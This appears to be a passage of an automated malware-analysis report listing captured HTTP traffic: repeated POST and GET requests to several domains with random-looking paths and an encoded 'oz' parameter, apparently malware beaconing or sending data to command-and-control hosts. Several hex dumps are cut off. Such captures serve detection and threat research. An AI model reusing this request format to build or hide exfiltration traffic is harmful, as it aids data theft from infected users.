        Source: global trafficHTTP traffic detected: POST /qwk1/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.komart.shopOrigin: http://www.komart.shopReferer: http://www.komart.shop/qwk1/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 2b 73 36 62 5a 58 41 59 48 6e 61 6d 63 51 4b 36 51 67 6f 73 57 63 30 72 31 43 6c 7a 48 74 73 6d 6e 75 78 62 34 79 71 37 52 65 6d 41 6d 76 32 37 6c 4e 58 4a 72 41 67 54 79 5a 31 59 6a 44 63 42 6d 2f 53 53 35 71 76 6b 66 5a 30 55 44 65 79 74 56 5a 51 47 47 30 45 48 55 33 65 36 5a 56 74 31 30 54 51 64 47 76 52 70 48 49 79 52 49 74 7a 32 61 43 42 4b 53 70 42 64 42 75 65 44 52 44 39 33 66 6a 48 38 6a 53 6b 39 65 4c 62 65 50 44 4c 70 6a 59 35 36 5a 48 36 70 69 4b 5a 50 76 30 36 50 53 67 6d 71 6a 2b 59 61 7a 35 69 47 44 39 51 66 6c 45 6b 70 34 50 71 37 45 67 54 36 7a 48 47 71 57 48 78 79 73 58 56 68 6f 45 56 63 34 42 54 55 6f 34 2b 67 55 57 42 7a 4d 38 52 47 73 42 66 53 45 52 6b 4c 70 79 2f 75 6f 4c 31 4a 49 55 51 2f 67 70 2b 7a 77 2b 77 74 61 6d 78 4a 71 72 67 30 4f 6e 35 42 2b 77 58 34 31 73 62 78 74 42 6e 58 75 2b 42 36 68 76 47 33 77 47 75 2f 4d 6b 6e 52 75 43 73 56 64 47 66 6a 72 79 70 6a 35 34 58 50 39 6f 79 31 76 65 58 58 68 6c 67 69 63 75 55 68 6f 57 58 70 64 68 6c 78 6c 61 30 74 54 37 42 69 51 65 65 6c 58 42 39 63 2b 48 32 79 69 4c 70 35 39 42 54 65 30 62 5a 65 57 6c 75 51 47 2f 39 79 6e 6a 63 68 7a 62 6e 4a 6e 61 7a 72 77 67 77 69 4f 79 33 67 33 57 67 4b 49 57 4b 43 74 6e 54 54 42 57 62 69 2b 46 45 79 46 38 6a 38 78 78 6b 43 4d 6a 58 75 4b 66 55 32 77 35 6c 56 50 48 2f 42 62 6f 69 39 6b 78 70 4d 2b 2f 52 5a 36 63 77 58 57 77 57 51 57 50 6f 4d 5a 34 35 54 33 59 4c 52 33 44 68 44 38 64 55 58 50 45 72 70 35 4e 57 35 69 4e 43 6b 79 6d 6a 41 4a 76 6d 79 6b 6a 71 54 58 79 57 43 79 36 38 68 79 76 69 59 68 33 44 71 69 78 31 4c 58 30 67 53 41 73 55 76 4d 42 4e 7a 58 43 76 66 2b 2b 56 50 5a 78 51 45 51 48 45 6f 72 2f 38 66 77 7a 5a 79 65 75 6a 7a 48 39 7a 2b 4f 73 72 62 6f 6b 59 6b 31 58 71 65 63 37 71 45 65 64 46 43 78 52 70 4a 77 63 74 31 6d 61 58 78 4b 66 58 7a 47 31 4c 35 73 31 49 6e 38 79 39 64 79 30 32 61 47 33 47 61 74 39 74 33 44 7a 4b 58 39 56 59 6f 6f 4a 74 6f 6c 4e 2b 50 43 33 63 39 30 52 79 6c 6b 2f 6a 53 43 38 62 62 66 64 37 49 33 49 2b 74 41 6b 7a 38 69 69 43 67 55 4d 61 38 79 32 65 4a 4e 4b 36 46 Data Ascii: oz=+s6bZXAYHnamcQK6QgosWc0r1ClzHtsmnuxb4yq7RemAmv27lNXJrAgTyZ1YjDcBm/SS5qvkfZ0UDeytVZQGG0EHU3e6ZVt10TQdGvRpHIyRItz2aCBKSpBdBueDRD93fjH8jSk9eLbePDLpjY56ZH6piKZPv06PSgmqj+Yaz5iGD9QflEkp4Pq7EgT6zHGqWHxysXVhoEVc4BTUo4+gUWBzM8RGsBfSERkLpy/uoL1JIUQ/gp+zw+wtamxJqrg0On5B+wX41sbxtBnXu+B6hvG3wGu/MknRuCsVdGfjrypj54XP9oy1veXXhlgicuUh
        Source: global trafficHTTP traffic detected: GET /qwk1/?oz=zuS7aiF7UCmUZEGCFTElZNoc1TsXMIUH7bJjsGqWHOHqpoebjKjp7AEKoIo96ikD3t7upPrvfpp3YpWkIK1WRnsiE3z7WHp76C45XcEHI5LxV+/vcHJ1HMs=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.komart.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /ytua/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dxeg.lolOrigin: http://www.dxeg.lolReferer: http://www.dxeg.lol/ytua/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 54 47 41 71 78 2f 42 67 6f 4a 74 77 2b 68 32 6e 42 6f 59 37 57 76 52 6d 56 67 50 6d 44 53 61 44 49 34 72 32 35 71 59 33 75 6d 42 43 35 70 35 6c 6f 32 47 62 30 54 42 71 68 44 71 49 7a 57 64 6b 69 6e 62 71 75 42 7a 66 4f 56 53 68 6c 2b 58 54 35 79 47 48 63 63 73 4f 32 44 4e 46 54 59 44 4a 6f 32 79 52 66 51 53 59 32 56 74 74 33 78 30 73 37 68 79 37 70 36 30 38 2f 38 6f 46 79 56 4d 48 59 68 68 43 55 2f 4a 54 2b 4c 76 55 33 4e 2b 32 5a 5a 6c 4f 63 68 4f 55 74 35 67 65 62 73 58 42 56 66 66 74 69 30 6f 47 6a 55 58 6b 2f 4e 55 63 4f 75 4e 39 42 78 57 42 7a 46 77 41 57 6c 37 48 4e 77 3d 3d Data Ascii: oz=TGAqx/BgoJtw+h2nBoY7WvRmVgPmDSaDI4r25qY3umBC5p5lo2Gb0TBqhDqIzWdkinbquBzfOVShl+XT5yGHccsO2DNFTYDJo2yRfQSY2Vtt3x0s7hy7p608/8oFyVMHYhhCU/JT+LvU3N+2ZZlOchOUt5gebsXBVffti0oGjUXk/NUcOuN9BxWBzFwAWl7HNw==
        Source: global trafficHTTP traffic detected: POST /ytua/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dxeg.lolOrigin: http://www.dxeg.lolReferer: http://www.dxeg.lol/ytua/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 54 47 41 71 78 2f 42 67 6f 4a 74 77 2f 42 6d 6e 48 4a 59 37 44 2f 52 6c 62 41 50 6d 4e 43 61 48 49 34 6e 32 35 72 63 6e 74 55 56 43 36 49 70 6c 72 30 69 62 7a 54 42 71 35 7a 71 4e 39 32 64 7a 69 6e 65 66 75 45 4c 66 4f 55 79 68 6c 38 66 54 34 46 61 47 61 4d 73 4d 39 6a 4e 48 4f 49 44 4a 6f 32 79 52 66 54 75 2b 32 55 4a 74 32 42 45 73 70 41 79 34 6e 61 31 4f 76 73 6f 46 6c 46 4d 44 59 68 68 77 55 37 4a 31 2b 4f 72 55 33 4a 32 32 61 49 6c 4e 57 68 50 66 6a 5a 68 47 54 74 36 46 4f 2b 4c 6c 72 6e 4e 59 68 52 48 5a 36 62 46 47 54 63 35 5a 43 69 4b 7a 33 31 4a 6f 55 6e 36 63 51 30 61 44 2f 30 43 45 4d 36 62 4d 4c 38 4b 2f 4d 79 69 7a 53 37 6f 3d Data Ascii: oz=TGAqx/BgoJtw/BmnHJY7D/RlbAPmNCaHI4n25rcntUVC6Iplr0ibzTBq5zqN92dzinefuELfOUyhl8fT4FaGaMsM9jNHOIDJo2yRfTu+2UJt2BEspAy4na1OvsoFlFMDYhhwU7J1+OrU3J22aIlNWhPfjZhGTt6FO+LlrnNYhRHZ6bFGTc5ZCiKz31JoUn6cQ0aD/0CEM6bML8K/MyizS7o=
        Source: global trafficHTTP traffic detected: POST /ytua/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dxeg.lolOrigin: http://www.dxeg.lolReferer: http://www.dxeg.lol/ytua/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 54 47 41 71 78 2f 42 67 6f 4a 74 77 2f 42 6d 6e 48 4a 59 37 44 2f 52 6c 62 41 50 6d 4e 43 61 48 49 34 6e 32 35 72 63 6e 74 55 4e 43 35 2f 70 6c 72 56 69 62 79 54 42 71 30 54 71 4d 39 32 64 79 69 6e 6d 54 75 45 50 68 4f 52 32 68 6c 5a 54 54 70 41 75 47 54 4d 73 4d 79 44 4e 47 54 59 44 63 6f 32 69 56 66 54 2b 2b 32 55 4a 74 32 44 63 73 2f 68 79 34 6c 61 30 38 2f 38 6f 43 79 56 4d 37 59 68 34 46 55 37 4e 44 2f 36 66 55 33 70 6d 32 4b 71 39 4e 61 68 50 64 7a 4a 68 56 54 74 32 4b 4f 2f 6e 66 72 69 77 31 68 57 62 5a 36 65 67 6a 4c 66 31 36 64 54 61 57 2b 55 35 4e 54 46 4c 50 59 44 71 72 7a 6c 71 76 50 4f 58 6b 56 74 75 71 59 67 53 41 50 4d 52 47 41 41 63 6d 39 61 56 63 51 73 59 63 32 67 34 57 64 7a 59 65 48 50 4b 56 46 74 34 34 62 4f 41 30 75 2b 39 46 42 35 34 63 54 64 4a 39 6a 6d 5a 4e 48 33 61 62 69 31 42 30 70 48 76 49 63 35 32 5a 71 70 6e 6c 4a 57 4b 2b 49 75 77 35 2b 33 49 62 47 68 64 44 55 70 41 49 37 7a 72 41 70 78 43 4c 6e 72 49 52 63 32 4d 45 71 4f 46 38 6e 47 44 50 31 78 56 35 78 6b 61 39 77 33 39 6b 42 56 6f 69 34 42 51 49 44 39 78 56 6a 62 5a 6c 4e 4a 37 48 56 77 58 47 49 2b 76 66 46 49 6b 42 53 45 78 42 63 78 68 79 6b 63 36 48 6b 7a 63 65 38 70 44 49 57 30 61 6c 42 46 4a 4c 44 35 48 68 65 39 6d 44 79 38 2f 69 77 4d 6d 66 77 70 73 65 71 68 42 79 48 4a 30 73 49 65 77 72 77 76 75 31 2f 58 50 4a 4c 53 5a 44 36 4d 55 6c 4f 57 38 69 39 2f 49 35 37 32 59 68 5a 56 6a 30 6a 4f 32 4e 4e 53 41 6c 52 70 4d 64 73 31 39 38 6b 6a 4c 66 74 77 6d 67 41 4b 45 73 50 6b 68 43 69 51 7a 32 4f 4f 48 4d 4d 4f 57 5a 47 33 42 48 5a 65 52 2f 38 34 55 4a 64 43 69 47 44 36 77 41 7a 64 38 43 78 65 64 41 75 7a 2b 42 4d 44 75 70 48 76 4e 61 68 38 6c 78 77 45 53 44 77 69 6a 57 71 43 4d 55 4b 47 2b 70 4b 4e 6c 48 50 74 73 67 43 61 66 4f 67 64 65 30 49 42 5a 42 74 63 4f 7a 39 56 4a 30 57 6e 48 6d 4d 33 30 37 41 77 50 42 57 2f 76 47 45 59 6d 36 2b 54 79 71 37 58 39 76 44 4f 44 37 57 5a 4e 56 57 49 46 4d 44 44 48 39 77 66 55 64 52 47 39 6f 54 6a 57 53 46 57 44 56 6e 6b 35 6d 36 56 2f 77 32 48 65 51 6b 59 41 46 67 44 57 59 63 47 48 4b 50 73 66 55 66 4d 42 37 4d 33 64 34 46 4b 32 71 42 73 44 58 35 63 50 78 42 43 68 55 41 7a 36 48 66 54 6a 4c 35 61 49 39 43 72 4a 64 69 69 39 58 61 42 39 6f 77 68 49 6d 78 72 49 37 4e 68 6a 7a 38 48 6a 4f 45 62 71 62 52 6b 41 34 4c 5a 4a 4b 6c 58 45 66 46 42 63 6e 5a 42 36 63 71 44 6b 43 4c 42 6a 78 63 4b 47 4d 48 79 34 48 71 71 7a 54 4b 4f 31 6
        Source: global trafficHTTP traffic detected: GET /ytua/?oz=eEoKyIBkgP1r3UaSX5x2BcdCaSeQE0m7SIzn6MAF2Eoa7eZjgA7VjWJ9hDDUm15GkCbg2BHkZRaH6Ojl2CuAMP081j8WR4/cwGyXJgzH3SFq+T0y0nykltc=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dxeg.lolConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /dlt0/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.tukaari.shopOrigin: http://www.tukaari.shopReferer: http://www.tukaari.shop/dlt0/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 77 6b 4e 4e 78 67 46 47 59 64 70 65 4d 58 57 5a 54 75 33 71 46 74 64 65 4e 46 52 6d 59 65 35 6b 44 4d 61 65 50 6a 4b 68 76 4d 7a 38 56 68 71 52 39 6b 70 5a 34 72 48 6e 70 51 77 52 2b 76 43 62 46 4d 57 58 48 7a 54 48 46 65 52 57 71 4e 54 78 41 52 57 74 6d 30 6a 62 62 52 48 71 2b 71 4d 35 71 64 6d 77 61 43 7a 50 5a 54 69 74 74 43 67 49 58 50 74 79 53 50 4c 67 33 4f 31 37 76 47 56 61 2f 58 33 41 5a 74 7a 75 78 32 4f 59 42 58 39 36 44 63 34 4a 77 32 57 2f 37 49 6d 44 62 34 45 71 4d 4d 78 39 67 44 43 4e 70 32 64 79 38 4d 58 2f 56 5a 61 71 73 48 77 54 4d 54 73 6d 6b 52 48 30 48 51 3d 3d Data Ascii: oz=wkNNxgFGYdpeMXWZTu3qFtdeNFRmYe5kDMaePjKhvMz8VhqR9kpZ4rHnpQwR+vCbFMWXHzTHFeRWqNTxARWtm0jbbRHq+qM5qdmwaCzPZTittCgIXPtySPLg3O17vGVa/X3AZtzux2OYBX96Dc4Jw2W/7ImDb4EqMMx9gDCNp2dy8MX/VZaqsHwTMTsmkRH0HQ==
        Source: global trafficHTTP traffic detected: POST /dlt0/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.tukaari.shopOrigin: http://www.tukaari.shopReferer: http://www.tukaari.shop/dlt0/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 77 6b 4e 4e 78 67 46 47 59 64 70 65 65 6e 6d 5a 66 70 44 71 44 4e 64 66 49 46 52 6d 57 2b 35 67 44 4d 57 65 50 67 47 78 76 2b 58 38 53 45 57 52 38 67 31 5a 35 72 48 6e 77 67 77 55 68 2f 43 75 46 4d 61 68 48 7a 66 48 46 65 31 57 71 4d 50 78 41 6d 4b 75 30 55 6a 46 4f 42 48 6f 68 36 4d 35 71 64 6d 77 61 43 32 61 5a 54 36 74 73 7a 51 49 57 75 74 31 59 76 4c 76 2b 75 31 37 72 47 56 65 2f 58 33 69 5a 73 65 35 78 31 6d 59 42 54 35 36 4e 70 4d 4b 6c 6d 58 32 2f 49 6e 42 55 59 64 63 49 2f 31 4a 78 42 57 57 73 46 55 4f 35 61 47 6c 49 72 75 4f 76 55 73 68 49 6a 56 4f 6d 54 47 76 61 53 6b 7a 61 37 67 7a 63 52 68 38 6f 45 43 59 38 54 66 49 59 75 34 3d Data Ascii: oz=wkNNxgFGYdpeenmZfpDqDNdfIFRmW+5gDMWePgGxv+X8SEWR8g1Z5rHnwgwUh/CuFMahHzfHFe1WqMPxAmKu0UjFOBHoh6M5qdmwaC2aZT6tszQIWut1YvLv+u17rGVe/X3iZse5x1mYBT56NpMKlmX2/InBUYdcI/1JxBWWsFUO5aGlIruOvUshIjVOmTGvaSkza7gzcRh8oECY8TfIYu4=
        Source: global trafficHTTP traffic detected: POST /dlt0/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.tukaari.shopOrigin: http://www.tukaari.shopReferer: http://www.tukaari.shop/dlt0/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 77 6b 4e 4e 78 67 46 47 59 64 70 65 65 6e 6d 5a 66 70 44 71 44 4e 64 66 49 46 52 6d 57 2b 35 67 44 4d 57 65 50 67 47 78 76 2b 66 38 56 32 4f 52 39 42 31 5a 72 37 48 6e 34 41 77 56 68 2f 43 7a 46 4d 43 39 48 7a 43 38 46 59 78 57 6c 4f 72 78 45 6e 4b 75 74 6b 6a 46 57 78 48 31 2b 71 4d 57 71 5a 4c 37 61 43 6d 61 5a 54 36 74 73 77 49 49 52 2f 74 31 65 76 4c 67 33 4f 31 42 76 47 56 36 2f 57 66 59 5a 73 72 45 77 46 47 59 41 33 64 36 50 62 55 4b 34 57 58 34 79 6f 6e 6a 55 59 68 50 49 2b 5a 76 78 41 79 73 73 47 6b 4f 35 65 2f 76 64 36 61 72 74 46 77 53 49 42 4a 32 6f 53 65 38 64 68 64 50 55 4c 34 4e 43 6e 42 79 68 56 47 78 70 54 50 50 43 70 41 74 57 35 31 6a 6b 6f 42 6b 52 35 69 50 45 74 38 74 70 74 66 32 48 4f 79 62 31 47 5a 6a 69 55 6f 4d 51 47 54 4c 41 72 76 77 4a 4b 56 36 6b 66 62 4a 6b 70 72 63 49 30 53 35 4a 79 54 38 63 56 37 57 36 45 49 30 2f 59 42 61 54 69 6f 68 78 52 54 48 56 4d 4f 6e 58 46 48 37 4c 7a 57 37 51 59 6e 42 48 71 44 7a 2f 39 32 59 2f 6b 65 65 79 57 74 58 53 66 53 2b 4a 55 50 38 4a 4d 6a 56 49 73 77 41 6d 79 70 78 64 65 2b 6f 34 4b 61 58 6b 73 6a 71 65 62 56 65 71 33 7a 50 38 61 47 52 54 44 2f 4f 34 30 37 66 39 51 51 38 35 51 2f 78 76 50 61 52 77 5a 4a 75 4a 6f 68 33 64 4f 30 77 65 69 57 2b 36 76 45 4d 51 2f 4e 4b 66 35 31 62 4f 44 62 33 76 52 2f 6e 4b 72 50 6b 4c 63 31 66 77 4d 46 57 76 70 2b 4c 43 58 43 67 6e 4b 63 31 55 57 2b 34 33 36 6e 30 50 63 57 41 37 32 37 76 71 35 47 4b 37 45 58 42 51 73 45 61 56 6e 42 55 37 66 4c 7a 39 35 58 4a 69 70 77 36 51 4d 2b 77 56 37 58 6b 4c 6e 6b 53 42 69 43 73 4a 4a 2b 4a 37 67 34 42 52 43 5a 76 61 79 34 38 52 49 43 59 54 75 4e 42 6a 70 34 32 4c 33 6b 6c 58 53 32 51 30 57 46 6f 4a 56 49 44 4a 58 2f 4c 43 7a 68 45 36 58 51 54 33 55 61 51 38 59 4b 47 41 7a 35 63 44 2f 74 35 6b 41 45 47 61 64 55 6f 56 62 30 46 38 4a 70 66 54 79 6e 63 66 35 6e 51 6c 71 70 50 46 4d 79 30 46 66 58 5a 61 46 73 6d 31 36 6c 6f 48 64 56 53 51 43 30 61 37 37 2b 55 4c 41 4e 79 71 43 76 56 68 79 55 31 38 35 7a 67 72 57 79 6e 74 69 66 4e 56 2f 63 58 46 56 54 57 67 6d 79 53 32 Data Ascii: oz=wkNNxgFGYdpeenmZfpDqDNdfIFRmW+5gDMWePgGxv+f8V2OR9B1Zr7Hn4AwVh/CzFMC9HzC8FYxWlOrxEnKutkjFWxH1+qMWqZL7aCmaZT6tswIIR/t1evLg3O1BvGV6/WfYZsrEwFGYA3d6PbUK4WX4yonjUYhPI+ZvxAyssGkO5e/vd6artFwSIBJ2oSe8dhdPUL4NCnByhVGxpTPPCpAtW51jkoBkR5iPEt8tptf2HOyb1GZjiUoMQGTLArvwJKV6kfbJkprcI0S5JyT8cV7W6EI0/YBaTiohxRTHVMOnXFH7LzW7QYnBHqDz/92Y/keeyW
        Source: global trafficHTTP traffic detected: GET /dlt0/?oz=9mltyUpqTpNFGgiLLM/QIt0JA1EyaLVwbNO6LVK8xMKAahqO0kx85NrrrztI4+WdJ+WmFSXeCNM39PHdIGjD1nD8ckOcgacQtsimUjnJeyDglSYeX59cdP4=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tukaari.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /tcs6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.invicta.worldOrigin: http://www.invicta.worldReferer: http://www.invicta.world/tcs6/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 5a 52 44 57 57 6e 30 49 53 59 55 59 59 72 68 6a 6d 34 2b 75 44 55 64 34 57 77 75 36 45 71 67 57 4e 75 57 65 6e 52 70 6b 43 2b 47 43 4e 4d 79 6b 6b 68 49 4c 48 44 4e 36 30 39 54 6c 41 65 51 50 68 36 5a 69 59 67 53 4e 4a 30 6c 48 62 6c 5a 36 35 4a 74 65 35 48 53 71 42 41 55 31 39 62 30 6b 6e 58 6e 7a 72 2b 6f 78 73 6c 63 31 67 4e 6c 6b 35 79 74 33 47 72 6c 2b 72 4d 77 44 6c 33 4a 2b 70 4f 2b 6f 7a 37 33 67 74 78 41 2b 62 4c 2f 37 45 42 37 67 65 7a 30 6c 6d 38 4f 50 6e 35 2b 30 65 4c 72 77 61 76 62 36 38 62 38 50 6c 6d 56 51 52 4e 49 49 63 79 61 62 2b 69 4f 53 38 32 6a 52 73 67 3d 3d Data Ascii: oz=ZRDWWn0ISYUYYrhjm4+uDUd4Wwu6EqgWNuWenRpkC+GCNMykkhILHDN609TlAeQPh6ZiYgSNJ0lHblZ65Jte5HSqBAU19b0knXnzr+oxslc1gNlk5yt3Grl+rMwDl3J+pO+oz73gtxA+bL/7EB7gez0lm8OPn5+0eLrwavb68b8PlmVQRNIIcyab+iOS82jRsg==
        Source: global trafficHTTP traffic detected: POST /tcs6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.invicta.worldOrigin: http://www.invicta.worldReferer: http://www.invicta.world/tcs6/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 5a 52 44 57 57 6e 30 49 53 59 55 59 4b 61 52 6a 6c 5a 2b 75 43 30 64 37 56 77 75 36 4e 4b 67 4b 4e 75 61 65 6e 51 74 30 44 4d 53 43 4b 73 43 6b 6c 6b 6b 4c 4b 6a 4e 36 38 64 54 6b 4e 2b 52 69 68 36 64 41 59 6b 53 4e 4a 31 42 48 62 6b 70 36 34 2b 5a 66 34 58 53 73 4d 67 55 7a 69 72 30 6b 6e 58 6e 7a 72 39 55 66 73 6c 55 31 67 64 56 6b 72 57 78 32 59 37 6c 78 68 73 77 44 68 33 4a 36 70 4f 2f 39 7a 2f 58 4f 74 7a 49 2b 62 50 37 37 41 41 37 6e 48 6a 30 2f 73 63 50 63 68 70 37 34 65 2f 65 4e 63 49 37 78 31 35 31 79 70 51 45 4b 4d 2f 38 73 66 68 47 70 36 53 33 36 2b 30 69 4b 78 73 69 77 61 6e 37 2f 6b 69 50 63 62 2b 44 33 37 63 4e 37 51 66 73 3d Data Ascii: oz=ZRDWWn0ISYUYKaRjlZ+uC0d7Vwu6NKgKNuaenQt0DMSCKsCklkkLKjN68dTkN+Rih6dAYkSNJ1BHbkp64+Zf4XSsMgUzir0knXnzr9UfslU1gdVkrWx2Y7lxhswDh3J6pO/9z/XOtzI+bP77AA7nHj0/scPchp74e/eNcI7x151ypQEKM/8sfhGp6S36+0iKxsiwan7/kiPcb+D37cN7Qfs=
        Source: global trafficHTTP traffic detected: POST /tcs6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.invicta.worldOrigin: http://www.invicta.worldReferer: http://www.invicta.world/tcs6/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 5a 52 44 57 57 6e 30 49 53 59 55 59 4b 61 52 6a 6c 5a 2b 75 43 30 64 37 56 77 75 36 4e 4b 67 4b 4e 75 61 65 6e 51 74 30 44 4d 4b 43 4b 65 4b 6b 6a 44 51 4c 4c 6a 4e 36 79 39 54 68 4e 2b 52 61 68 36 6c 45 59 6b 57 37 4a 33 4a 48 61 47 52 36 74 38 78 66 78 58 53 73 46 41 55 32 39 62 31 2b 6e 58 33 33 72 2b 73 66 73 6c 55 31 67 62 52 6b 75 79 74 32 61 37 6c 2b 72 4d 77 50 6c 33 4a 53 70 50 61 4b 7a 2b 58 77 74 44 6f 2b 62 76 72 37 47 69 54 6e 50 6a 30 35 76 63 4f 62 68 6f 47 36 65 2b 33 30 63 49 6d 6d 31 36 46 79 71 47 6c 78 49 4c 49 4f 64 53 43 6c 31 52 48 4b 32 58 37 5a 79 50 37 4c 4c 57 66 2f 75 57 44 75 62 38 4c 46 2b 4d 35 6b 4a 66 53 36 71 45 59 38 45 61 6e 30 58 66 73 77 69 7a 65 73 52 64 54 55 36 4d 59 6e 4d 6e 36 51 38 63 61 63 33 65 51 59 54 6d 78 57 47 6e 64 6f 6f 46 32 34 4a 62 77 2f 4e 72 7a 51 6e 67 72 74 55 55 57 61 56 75 65 51 6e 38 74 34 35 65 38 55 65 4c 38 72 7a 39 70 55 77 4c 51 7a 4d 55 4c 4b 4a 34 6c 76 52 67 4b 58 31 63 48 2b 55 64 4e 43 58 77 36 65 75 33 51 69 47 41 71 75 61 7a 75 43 39 38 4d 72 42 79 31 56 48 62 56 48 6b 4d 37 75 6c 